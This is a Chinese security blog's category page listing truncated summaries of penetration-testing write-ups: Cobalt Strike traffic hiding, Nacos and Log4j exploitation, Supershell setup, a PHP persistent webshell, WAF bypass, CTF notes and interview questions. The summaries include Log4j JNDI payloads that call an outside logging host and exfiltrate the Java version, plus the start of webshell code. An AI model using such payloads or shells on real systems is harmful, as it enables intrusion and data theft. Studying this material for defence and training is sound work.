随笔分类 - 网络安全
发表于 2024-06-14 17:16阅读:371评论:0推荐:0
摘要:fofa搜索语句:product="AliyunOSS" && body="NoSuchBucket" 访问https://xxx.oss-ap-south-1.aliyuncs.com/ 发现 <Code>NoSuchBucket</Code> <HostId>pkdyxxxx.img-cn-ho
阅读全文 »
发表于 2024-06-05 16:00阅读:3评论:0推荐:0
该文被密码保护。
发表于 2024-02-28 11:28阅读:805评论:0推荐:0
摘要:Cobalt Strike特征隐藏和流量加密 因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。 悲报,还被提交了工单。 做安全测试不要用公司网!不要用公司网!不要用公司网! 服务器开启禁Ping 命令: vim /etc/sysctl.conf 添加一行 net.ipv4.icmp_ec
阅读全文 »
发表于 2023-12-21 15:23阅读:224评论:0推荐:0
摘要:Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos
阅读全文 »
发表于 2023-09-21 18:40阅读:1753评论:0推荐:0
摘要:今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h
阅读全文 »
发表于 2023-09-08 17:50阅读:394评论:0推荐:0
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1
阅读全文 »
发表于 2023-09-08 17:16阅读:425评论:0推荐:0
摘要:本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63574-1-1.html 国护夜班实在太无聊了,半夜燥热,客户还偷偷藏我们项目经理买的零食,哎,浅浅摸个鱼 打个ctfshow内网靶场。 记一次步履艰辛的
阅读全文 »
发表于 2023-09-05 20:32阅读:89评论:0推荐:0
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63544-1-1.html 记一次PHP路由审计 工具:Seay源代码审计系统 0x1 反射型xss 首先进行一个自动化扫描,根据结果进行跟进排查 跟进/user/tpl
阅读全文 »
发表于 2023-09-05 20:31阅读:780评论:0推荐:1
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63533-1-1.html SQLMAP流量特征分析 配置环境 测试靶场:pikachu 测试环境:PHP5.4、Apache 2.0、MYSQL5.0.10 测试工具:
阅读全文 »
发表于 2023-08-29 18:44阅读:306评论:0推荐:0
摘要:本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63575-1-1.html 本文参考书籍 --> 奇安信出版的《网络安全攻防技术实践》 WAF bypass 0x01 垃圾数据绕过 假设一个参数,然后填充
阅读全文 »
发表于 2023-08-20 02:27阅读:2615评论:0推荐:0
摘要:国护摸鱼,导致60g流量也不够用了。。又不想花钱买流量(我是穷逼),网上找了几个wifi暴力破解(我的电脑并未用于监测研判等工作),md不要去网上乱下载exe之类的可执行文件哦,github上有一个傻呗的wifi破解.exe是个恶意文件,幸好留了个心眼放到了沙箱看了看,草,那人是真没🐎。红队钓鱼也
阅读全文 »
发表于 2023-06-11 12:10阅读:286评论:0推荐:0
摘要:内存马(不死马) 最常见的内存马 <?php set_time_limit(0); #用来设置脚本最大的执行时间,如果为0的话,就会一直执行这个脚本,设置其他数字的话,则按照设置的秒数来进行执行,注意,执行时间和php.ini里的max_execution_time设置有很大的关系,真实时间的计算公
阅读全文 »
发表于 2023-05-25 19:04阅读:718评论:0推荐:0
摘要:最近在一次授权内网渗透过程中,发现内网存在安恒的明御安全网关,并且在朋友的帮助下成功进入后台,弱口令进入后台,后台功能十分熟悉,在很多厂商的网关里见过,就随手打了一个poc,好了rce了,于是便有了混个证的想法。但是十个弱口令进后台的网站可难住我了,fofa了一下有2000多个站点,试了十几个就一个
阅读全文 »
发表于 2023-05-14 16:35阅读:787评论:0推荐:0
摘要:go环境和fscan编译 https://go.dev/dl/ 下载go1.20.4.windows-386.msi nextnextnext就好了 查看go的版本 下载proxifier https://www.proxifier.com/download/ 配置go环境 在cmd命令行中输入代码
阅读全文 »
发表于 2023-05-14 00:06阅读:89评论:0推荐:0
摘要:第20届全国大学生信息安全与对抗技术竞赛 荣获 个人赛一等奖 福建省第三届"闽盾杯" 荣获 省赛二等奖荣誉证书 福建省第二届工业互联网安全大赛 荣获 优胜奖 第六届全国网络安全挑战赛"强网杯" 荣获 强网先锋荣誉证书 第一届网络安全技术大赛--校赛 荣获 个人二等奖
阅读全文 »
发表于 2023-05-11 15:07阅读:137评论:0推荐:0
摘要:之前忘了发,整理了一下美团一面的面试题 ps:一面就寄了QAQ 自我介绍 询问实习经历 为什么接触网络安全? 你们俱乐部是怎么学习分享的? 都挖到过什么漏洞? 重放,并发漏洞的原理? ssrf怎么利用? redis拿shell方法? 常见的加密方式? 对称加密和非对称加密比如哪些? ssrf绕过方法
阅读全文 »
发表于 2023-05-11 12:43阅读:72评论:0推荐:0
摘要:本文源于换了个java版本结果之前的东西都没卸载干净,导致jar文件无法双击打开,但是java -version却好好的。由于懒一直没去正面面对。 近期一直用命令行java -jar的方式打开尤为苦恼,正赶着最近项目,便沉下心思好好修了修。 由于本篇文章仅作个人修复记录,故部分内容参考其他文章,侵删
阅读全文 »
发表于 2023-02-27 22:32阅读:95评论:0推荐:0
摘要:230227安恒安服一面 常规的渗透测试流程? src目前提交过什么漏洞?收入有五位数了吗?挖多久了? 你接触网络安全是出于兴趣还是学校的课程? CTF你主要打的方向是什么方向? 你运营公众号都写过什么文章? 你之前做过代码审计这块吗? 内网渗透这块你在实战中打过吗? windows常规提权? 数据
阅读全文 »
发表于 2022-10-26 22:50阅读:98评论:0推荐:0
摘要:刷题随笔 web254 题目 直接传参,没啥好说的 web255 题目 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxx
阅读全文 »
